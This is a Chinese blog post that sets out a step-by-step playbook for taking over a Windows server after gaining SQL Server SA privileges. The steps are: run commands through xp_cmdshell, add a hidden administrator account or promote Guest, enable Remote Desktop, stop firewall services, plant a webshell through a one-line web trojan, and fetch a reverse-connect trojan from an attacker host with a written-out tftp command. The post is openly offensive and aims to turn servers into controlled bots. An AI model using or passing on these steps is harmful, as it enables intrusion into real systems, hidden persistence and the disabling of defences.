讲解SA权限的渗透思路

一、直接执行命令提权得服务器
如果xp_cmdshell没有删除(如果被删,我们可以尝试恢复)

思路一

㈠ 执行命令探测相关信息

㈡ 根据相关信息提升权限
1.添加新用户并提升为管理员(用户名后加$,达到隐藏效果)
2.激活Guest,并提升为管理员

㈢ 查看终端服务(如果没开,我们可以尝试开33889)
1.先查看端口,如果开了3389,98%就是终端端口了
2.如果没开3389,用Net start查看开没有开终端服务(Terminal Service)。如果没开,尝试开启。

PS:提醒下的是还可开启Telnet服务,但已经是SA权限了,好像没什么不可能的了,开Telnet好像有点多此一举,但毕竟也是一种思路,就顺便说下。

㈣ 连接3389,得服务器权限。
如果连接失败,最大的可能就是防火墙了,用Net start命令查看服务,如发现有关防火墙的相关服务停掉相关服务。再连接。

PS:可考虑端口重定向绕过防火墙。

思路二

㈠ 执行命令探测相关信息

㈡ 利用TFTP下载反弹木马(如果TFTP.EXE被删,可尝试上传一个,或者写角本亦可下载)
TFTP命令是tftp -i IP get 反弹木马.exe C:\反弹木马.exe

㈢ 利用命令执行反弹木马

㈣ 成功获服务器肉鸡一台

二、先得Webshell,再通过Webshell提权

xp_cmdshell依赖的是sql的组件xplog70.dll这个动态连接库文件 如果xplog70.dll也被删,恢复XP_cmdshell已经无望,我们只有换种思路了。

PS:即使删除了xp_cmdshell和xplog70.dll,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell,利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,照样可以得到一个SHell。

思路三

㈠ 通过列目录找到Web目录

㈡ 上传写入一句话木马

㈢ 写入小马 再写大马

㈣ 成功得到Webshell 用webshell上传文件

㈤ 权限提升

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三朝看客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值